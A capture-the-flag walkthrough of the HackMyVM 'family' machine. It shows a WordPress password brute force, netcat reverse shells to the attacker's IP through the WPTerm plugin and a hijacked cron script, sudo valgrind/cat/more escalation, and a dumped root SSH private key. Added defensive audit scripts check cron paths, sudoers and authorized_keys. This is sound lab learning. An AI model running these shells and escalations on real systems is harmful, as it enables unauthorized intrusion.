
HMV-family

HMV-family target machine walkthrough

Port scanning

```
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.112.12
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-13 10:41 CST
Nmap scan report for 192.168.112.12 (192.168.112.12)
Host is up (0.0024s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 0d:4e:fd:57:05:8f:d0:d6:1d:67:5d:6d:4e:b5:c9:fc (RSA)
| 256 d4:98:fb:a7:94:bd:0c:c6:a8:60:5b:bc:b9:c7:f4:51 (ECDSA)
|_ 256 fa:34:3a:25:74:40:99:fc:4f:60:be:db:7e:7f:93:be (ED25519)
80/tcp open http Apache httpd 2.4.38
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2020-02-06 07:33 wordpress/
|_
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 06:66:FC:0B:B7:E2 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 2.38 ms 192.168.112.12 (192.168.112.12)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.44 seconds
```

Ports 22 and 80 are open, and port 80 is serving a WordPress directory.

Web enumeration

Browsing to the web root shows a single directory; opening it gives the following:

Running wpscan directly against the IP, however, reports that the site is not WordPress. When I submitted the input box, the URL of the page it redirected to changed, so we map that name in the hosts file.
After that the WordPress login page loads normally; by default it is at /wp-admin.

Then capture the login request in Burp, fix the username as admin and brute-force the password.
The password is phantom.

We are in the WordPress dashboard.

Next, install the WPTerm plugin, which lets us run shell commands: https://wordpress.org/plugins/wpterm/
Once installed, it appears under Tools.

Enter the reverse shell command nc 192.168.112.83 1234 -e /bin/bash and we get a www-data shell.

```
┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
script -qc /bin/bash /dev/null
www-data@family:/var/www/html/wordpress$ stty raw -echo; fg
stty raw -echo; fg
bash: fg: current: no such job
www-data@family:/var/www/html/wordpress$ ^Z
zsh: suspended nc -lp 1234

┌──(root㉿kakeru)-[~/tmp]
└─# stty raw -echo; fg
[1] + continued nc -lp 1234
reset: unknown terminal type unknown
Terminal type? xterm
```

Privilege escalation

Looking in /home, there are three users in total.

```
www-data@family:/var/www/html/wordpress$ ls /home
baby father mother
```

We can also find the www-data user's bash history.

```
www-data@family:/var/www$ cat .bash_history 
export TERM=xterm
clear
cd /home
ls
cd baby
cd mother
cd father
clear
find / -group www-data -type f 2>/dev/null | grep -v /var/www
find / -group www-data -type f 2>/dev/null | grep -v -E "/var/www|proc"
cat /usr/share/perl/5.28.1/perso.txt
ls -l /usr/share/perl/5.28.1/perso.txt
su - father
export TERM=xterm
clear
sudo -l

www-data@family:/var/www$ cat /usr/share/perl/5.28.1/perso.txt
uncrackablepassword
```

There is a suspicious file: right after reading it, the user switched to father.
Trying this password, we can indeed switch to the father user.

father

His home directory is empty, and there is no sudo and no SUID, so the next step is to download pspy64 from our own machine and look for scheduled tasks.

```
┌──(root㉿kakeru)-[~/tmp]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.112.12 - - [13/Feb/2025 12:52:51] "GET /pspy64 HTTP/1.1" 200 -

father@family:~$ wget 192.168.112.83/pspy64
--2025-02-13 05:52:50-- http://192.168.112.83/pspy64
Connecting to 192.168.112.83:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64 100%[=============================================>] 2.96M --.-KB/s in 0.09s

2025-02-13 05:52:51 (33.1 MB/s) - ‘pspy64’ saved [3104768/3104768]

father@family:~$ chmod +x pspy64
father@family:~$ ./pspy64

2025/02/13 05:54:01 CMD: UID=1001 PID=963 | /bin/sh -c python ~/check.py
```

We can see that the user with uid 1001 periodically runs check.py from their home directory.
From /etc/passwd, uid 1001 is mother.

```
father@family:/home$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
father:x:1000:1000:father,,,:/home/father:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
mother:x:1001:1001:,,,:/home/mother:/bin/bash
baby:x:1002:1002:,,,:/home/baby:/bin/bash
```

father is also a member of the group on the mother directory and has write permission to it, so we write a Python reverse shell into check.py.

```
father@family:/home/mother$ cat check.py 
import os
os.system("nc 192.168.112.83 1235 -e /bin/bash")

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1235
id
uid=1001(mother) gid=1001(mother) groups=1001(mother)
```

mother's shell connects back successfully.
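From the defender's side, the root cause of this step is a scheduled job whose script sits in a directory that another user can write to. The audit script below is an added example written for this walkthrough, not code from the original post: it walks every path component of a scheduled script and reports any that are group- or world-writable, treating a writable parent directory as seriously as a writable file, since the file can simply be renamed away and replaced. The demo() function rebuilds the /home/mother layout as a constructed fixture in a temporary directory; the mode 0770 on it is an assumption that matches what the writeup describes (father's group membership gives write access).

```python
import os
import shutil
import stat
import tempfile


def writable_by_others(path):
    """Reasons why users other than the owner could modify `path`."""
    mode = os.lstat(path).st_mode
    # A sticky directory (/tmp) lets others add files but not rename or delete
    # entries they do not own, so it cannot be used to swap a script out.
    if stat.S_ISDIR(mode) and mode & stat.S_ISVTX:
        return []
    reasons = []
    if mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_scheduled_script(script_path):
    """Walk from / down to the script and return (path, reason) findings for
    every component that someone other than its owner could write."""
    findings = []
    current = os.sep
    for part in os.path.abspath(script_path).split(os.sep)[1:]:
        current = os.path.join(current, part)
        if not os.path.lexists(current):
            findings.append((current, "missing (a writable parent lets anyone create it)"))
            break
        for reason in writable_by_others(current):
            findings.append((current, reason))
    return findings


def demo():
    """Constructed reproduction of the layout on the box: a group-writable home
    directory containing the cron target check.py, which itself looks harmless."""
    root = tempfile.mkdtemp(prefix="audit-demo-")
    try:
        home = os.path.join(root, "mother")
        os.mkdir(home)
        os.chmod(home, 0o770)          # assumption: rwx for owner and group
        script = os.path.join(home, "check.py")
        with open(script, "w") as fh:
            fh.write("import os\n")
        os.chmod(script, 0o644)        # the file's own permissions are fine
        # Only report what lies under the fixture, not /tmp and its parents.
        return [
            (os.path.relpath(path, root), reason)
            for path, reason in audit_scheduled_script(script)
            if path.startswith(root + os.sep)
        ]
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

Running it prints mother: group-writable and nothing for check.py, which is exactly the blind spot: checking the file's own permissions would have said everything was fine. On a real host, feed it the script path from each cron or systemd timer entry, run as root so every directory is readable.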

mother

```
mother@family:~$ sudo -l
Matching Defaults entries for mother on family:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mother may run the following commands on family:
(baby) NOPASSWD: /usr/bin/valgrind
```

mother can run /usr/bin/valgrind as the baby user without a password.
Looking up the sudo technique for valgrind: it can launch a bash directly,
which gives us baby's shell.

```
mother@family:/usr/bin$ sudo -u baby /usr/bin/valgrind /bin/bash 
==1324== Memcheck, a memory error detector
==1324== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==1324== Using Valgrind-3.14.0 and LibVEX; rerun with -h for copyright info
==1324== Command: /bin/bash
==1324==
baby@family:/usr/bin$
```

baby

```
baby@family:/usr/bin$ sudo -l
Matching Defaults entries for baby on family:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User baby may run the following commands on family:
(ALL : ALL) NOPASSWD: /usr/bin/cat
```

baby can now read any file directly. First try reading the flag, but that file does not exist.
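Both sudo rules on this box (valgrind as baby, cat as anyone) are exactly what a sudoers review should catch before an attacker does. The script below is an added example, not part of the original writeup: it parses the rule lines of sudo -l output, handling the (runas) prefix, the NOPASSWD: tag and comma-separated command lists, and rates each rule. Its list of risky binaries is deliberately limited to the three that appear in this walkthrough (valgrind, cat, more); the two sample outputs are the ones shown on this page, embedded as strings.

```python
import re

# Binaries that appear in this walkthrough; each lets the caller do more than
# the rule author probably intended when run as another user via sudo.
RISKY_BINARIES = {
    "/usr/bin/valgrind": "executes any program it is given, so it can start a shell",
    "/usr/bin/cat": "reads any file, including private keys and /etc/shadow",
    "/usr/bin/more": "interactive pager with a '!' shell escape",
}

# "(runas) TAG: TAG: /path/one, /path/two"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$"
)


def parse_sudo_l(output):
    """Parse the rule lines printed after 'User X may run ...' in `sudo -l` output."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        match = RULE_RE.match(line)
        if not match:
            continue
        tags = {t.strip() for t in match.group("tags").split(":") if t.strip()}
        for cmd in match.group("cmds").split(","):
            rules.append({
                "runas": match.group("runas").replace(" ", ""),   # "ALL:ALL", "baby"
                "nopasswd": "NOPASSWD" in tags,
                "command": cmd.strip(),
            })
    return rules


def assess(rule):
    """Return (severity, reason) for one parsed rule."""
    binary = rule["command"].split()[0]
    runas_user = rule["runas"].split(":")[0]
    risky = RISKY_BINARIES.get(binary)
    if risky and runas_user in ("ALL", "root"):
        return ("critical", f"{binary} as root: {risky}")
    if risky:
        return ("high", f"{binary} as {runas_user}: {risky}")
    if rule["nopasswd"]:
        return ("medium", f"{binary} runs without a password")
    return ("info", f"{binary} requires the caller's password")


def audit(output):
    """List of (command, severity, reason) for every rule in a `sudo -l` dump."""
    return [(rule["command"], *assess(rule)) for rule in parse_sudo_l(output)]


# Constructed samples: the two `sudo -l` results seen on this machine.
MOTHER_SUDO_L = """Matching Defaults entries for mother on family:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User mother may run the following commands on family:
    (baby) NOPASSWD: /usr/bin/valgrind
"""

BABY_SUDO_L = """User baby may run the following commands on family:
    (ALL : ALL) NOPASSWD: /usr/bin/cat
"""

if __name__ == "__main__":
    for user, text in (("mother", MOTHER_SUDO_L), ("baby", BABY_SUDO_L)):
        for command, severity, reason in audit(text):
            print(f"{user}: [{severity}] {command}: {reason}")
```

The point of the two severities: valgrind as baby is a lateral move to another unprivileged account, while cat as ALL is an immediate read of root's private key, which is what the rest of this writeup uses. Neither rule needed NOPASSWD to be dangerous; the binary choice is the problem, and the fix is to grant a purpose-built wrapper script rather than a general tool.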

```
baby@family:/usr/bin$ sudo /usr/bin/cat /root/*.txt
/usr/bin/cat: '/root/*.txt': No such file or directory
```

So read .ssh/id_rsa instead and grab root's private key first.

```
baby@family:/usr/bin$ sudo cat /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAnbuWFqguL1RgxPF2kO1Fv1pC4BIFjxOp+ATX3k4WvuJyEdrcAFB5
esn89B6TTKjBffemI/Ppb6/KQ+RXjgh5ZtEzxmRHhO9v9OAcXm76M/0wmG49v+nD79y53b
KFMjcsqwvHZXjn4b3Wk1myQTC2sP763UNfBfd5ZH9uViBqT3NZQNrmzV8V534fZsGeHsMf
vvdbU5yRWlQIHypurKs5jKtwXnRJqpTnDkics2SBcqaL+1ivwZIyNlBvdS7YZBoxRasLG5
3UKg4SIc9K3ujdYtCDYYSGjRxHQLIDRx1wGDo4Bn3jBbZsHqT6A3mpx367jx08WHlcy+eb
hGyuXtnBrwAAA8CBizlZgYs5WQAAAAdzc2gtcnNhAAABAQCdu5YWqC4vVGDE8XaQ7UW/Wk
LgEgWPE6n4BNfeTha+4nIR2twAUHl6yfz0HpNMqMF996Yj8+lvr8pD5FeOCHlm0TPGZEeE
72/04Bxebvoz/TCYbj2/6cPv3LndsoUyNyyrC8dleOfhvdaTWbJBMLaw/vrdQ18F93lkf2
5WIGpPc1lA2ubNXxXnfh9mwZ4ewx++91tTnJFaVAgfKm6sqzmMq3BedEmqlOcOSJyzZIFy
pov7WK/BkjI2UG91LthkGjFFqwsbndQqDhIhz0re6N1i0INhhIaNHEdAsgNHHXAYOjgGfe
MFtmwepPoDeanHfruPHTxYeVzL55uEbK5e2cGvAAAAAwEAAQAAAQBKCYUXuXWETczmZJjM
yjLU8N83If5t/ELp4gwZkvnmO5BjhSGDHEMJOcp8I+XsM8IvCJF5isHl5NPCLmpShvPFKS
luVB+l7GXWwWNPiDP1N0EaK5TcgjOwYSD1SRhwS6mx1+OOY8QkF+GiZJXhN6ZpSiYiub7e
pBzc6Vu3HZwJElUCvAuCxDbazc+RUT9VzH2BdQ3w1D66T8c3ruuRD8P86s0zf7/Bo/OmBi
YeT/X3QcjyZTgmPjBR/m7nZNVUaDgWMCzIx2OecXX2bhdIVnpgVZVSq+EpidgvOPa/bjfQ
AXB5vEuQ7lGz15Hx2isz5ai/zAKIGY33omnDT3f4ESvRAAAAgCkSIIvDtArb/6jXQb57In
aExbm6PurE05TEHj/COnGSjD0iWk6CFFs33ud1A4FX1ACEVkEh51KBukSGhOXHd/nAH56i
pL4h5vmyt3JqLlilSkRju2oOH1I5edxIbTHD5aFHssD3l2OSaO4ax/h42BVp+Xr63FdDbS
NV8qd9gYp7AAAAgQDM02e+O6t1J+X41VaGRuJTnYCfWXKA5KnmmDM5UKQHm4i0dXL9xWgE
bBrFggoE2XsowMLRGOPe0ijuXOkgkpCeSB/rxmQ+Nn2x2O/H7yoIgl1IbpNIK6EZTaCebC
lfdn0hK55BSl394ql0y4ns91E4XL0Xvc9RDlBvGF5BAd/KwwAAAIEAxSQf51F5oIYIvl4l
9y3g77L+VlV0Yg9iLunUT/km9abp9e2oTsNXN3e9IHja5GVxOUjhlBC8Yposlv/oaAApJu
KC9XLqjqEmpo5gq61fG0HRPOkt1DKNuR3zIrWHot0DificHPyGISeu1/oR8tr9OR6Hmlvh
+AY4rKYqqUj+hqUAAAALcm9vdEBmYW1pbHk=
-----END OPENSSH PRIVATE KEY-----

┌──(root㉿kakeru)-[~/tmp]
└─# chmod 600 id_rsa

┌──(root㉿kakeru)-[~/tmp]
└─# ssh root@192.168.112.12 -i id_rsa
The authenticity of host '192.168.112.12 (192.168.112.12)' can't be established.
ED25519 key fingerprint is SHA256:c8APAkc6cpobBp5TlsyZ0NGBR6ZK9zbWY5binXumQhU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.112.12' (ED25519) to the list of known hosts.


oooo$$$$$$$$$$$$oooo
oo$$$$$$$$$$$$$$$$$$$$$$$$o
oo$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$o o$ $$ o$
o $ oo o$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$o $$ $$ $$o$
oo $ $ "$ o$$$$$$$$$ $$$$$$$$$$$$$ $$$$$$$$$o $$$o$$o$
"$$$$$$o$ o$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$o $$$$$$$$
$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$ $$$$$$$$$$$$$$ """$$$
"$$$""""$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ "$$$
$$$ o$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ "$$$o
o$$" $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$o
$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$" "$$$$$$ooooo$$$$o
o$$$oooo$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ o$$$$$$$$$$$$$$$$$
$$$$$$$$"$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$""""""""
"""" $$$$ "$$$$$$$$$$$$$$$$$$$$$$$$$$$$" o$$$
"$$$o """$$$$$$$$$$$$$$$$$$"$$" $$$
$$$o "$$""$$$$$$"""" o$$$
$$$$o oo o$$$"
"$$$$o o$$$$$$o"$$$$o o$$$$
"$$$$$oo ""$$$$o$$$$$o o$$$$""
""$$$$$oooo "$$$o$$$$$$$$$"""
""$$$$$$$oo $$$$$$$$$$
""""$$$$$$$$$$$
$$$$$$$$$$$$
$$$$$$$$$$"
"$$$""""





--More--(99%)
```

But no commands work inside this session, and the connection drops after a moment.
Checking a writeup, I learned to look at the public key.

```
baby@family:/usr/bin$ sudo cat /root/.ssh/authorized_keys
command="bash ~/troll.sh" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCdu5YWqC4vVGDE8XaQ7UW/WkLgEgWPE6n4BNfeTha+4nIR2twAUHl6yfz0HpNMqMF996Yj8+lvr8pD5FeOCHlm0TPGZEeE72/04Bxebvoz/TCYbj2/6cPv3LndsoUyNyyrC8dleOfhvdaTWbJBMLaw/vrdQ18F93lkf25WIGpPc1lA2ubNXxXnfh9mwZ4ewx++91tTnJFaVAgfKm6sqzmMq3BedEmqlOcOSJyzZIFypov7WK/BkjI2UG91LthkGjFFqwsbndQqDhIhz0re6N1i0INhhIaNHEdAsgNHHXAYOjgGfeMFtmwepPoDeanHfruPHTxYeVzL55uEbK5e2cGv root@family
```

The public key entry carries a forced command that runs troll.sh; let's see what that script does.

```
baby@family:/usr/bin$ sudo cat /root/troll.sh
#!/bin/sh
export TERM=xterm
more /root/welcome.txt
exit 0
```

It uses more to display welcome.txt, and GTFOBins lists a way to break out of this restricted shell.

```
!/bin/bash
root@family:~#
```

Root shell obtained. Done.
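The forced command in root's authorized_keys was meant to stop the key from yielding a shell, but without no-pty (or restrict, which implies it) the pager it runs is attached to a terminal and can be driven out of it. The following is an added example, not code from the original post: a parser for authorized_keys entries that handles commas and spaces inside a quoted command= option, plus a review() that reports a forced-command key missing those options. The key bodies are shortened placeholders, and the "hardened" line is my suggested fix, not something present on the box.

```python
KEY_TYPES = {
    "ssh-rsa", "ssh-ed25519", "ssh-dss",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
}


def _split_first_field(line):
    """Return (first_field, remainder); whitespace inside double quotes does not split."""
    quoted = False
    for i, ch in enumerate(line):
        if ch == '"' and (i == 0 or line[i - 1] != "\\"):
            quoted = not quoted
        elif ch.isspace() and not quoted:
            return line[:i], line[i:].lstrip()
    return line, ""


def _split_options(field):
    """Split the option list on commas that are not inside double quotes."""
    options, buf, quoted = [], [], False
    for i, ch in enumerate(field):
        if ch == '"' and (i == 0 or field[i - 1] != "\\"):
            quoted = not quoted
        if ch == "," and not quoted:
            options.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    if buf:
        options.append("".join(buf))
    return options


def parse_authorized_key(line):
    """Parse one authorized_keys line into options, key type, key body and comment."""
    line = line.strip()
    first, rest = _split_first_field(line)
    if first in KEY_TYPES:            # no option field at all
        option_fields, rest = [], line
    else:
        option_fields = _split_options(first)
    parts = rest.split(None, 2)
    if len(parts) < 2 or parts[0] not in KEY_TYPES:
        raise ValueError("not an authorized_keys entry: %r" % line)
    options = {}
    for opt in option_fields:
        name, _, value = opt.partition("=")
        options[name.strip()] = value.strip().strip('"') if value else True
    return {
        "options": options,
        "keytype": parts[0],
        "key": parts[1],
        "comment": parts[2] if len(parts) > 2 else "",
    }


def review(entry):
    """Findings for one entry, from the point of view of someone hardening the file."""
    opts = entry["options"]
    if "command" not in opts:
        return ["no forced command: the key gives an unrestricted login shell"]
    findings = []
    if "restrict" not in opts and "no-pty" not in opts:
        findings.append(
            "forced command can be given a PTY; any interactive program it runs "
            "(a pager such as more, an editor) can be driven to a shell"
        )
    if "restrict" not in opts and "no-port-forwarding" not in opts:
        findings.append("port forwarding is still allowed for a forced-command key")
    return findings


# Constructed sample entries. AS_FOUND mirrors the root@family line on this box
# (key body shortened to a placeholder); HARDENED is the suggested fix.
AS_FOUND = 'command="bash ~/troll.sh" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCduPLACEHOLDER root@family'
HARDENED = 'restrict,command="bash ~/troll.sh" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCduPLACEHOLDER root@family'
WITH_COMMA = 'command="echo hello, world",no-pty ssh-ed25519 AAAAC3NzaC1lZDI1NTE5PLACEHOLDER demo'

if __name__ == "__main__":
    for name, line in (("as found", AS_FOUND), ("hardened", HARDENED)):
        entry = parse_authorized_key(line)
        print(f"{name}: command={entry['options'].get('command')!r}")
        for finding in review(entry):
            print("  -", finding)
```

With no-pty in place, more has no terminal to talk to, so it just writes the file and troll.sh reaches its exit 0; the attacker in this writeup would have been logged out with nothing. The quoted-comma handling matters because sshd itself parses the option list that way, and a naive split(",") would have mis-read any command containing a comma.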

Summary

Learned the general approach for WordPress when plugin installation is allowed: install the WPTerm plugin to get a reverse shell.
During privilege escalation, check .bash_history to locate sensitive files.
Learned that valgrind can run /bin/bash and hand over a bash directly.
When an SSH login behaves strangely, check the public key file, ~/.ssh/authorized_keys.
Learned the more trick for escaping a restricted shell: !/bin/bash
Also worth knowing, the privilege escalation when more itself has sudo rights:

```
TERM= sudo more /etc/profile
!/bin/sh
```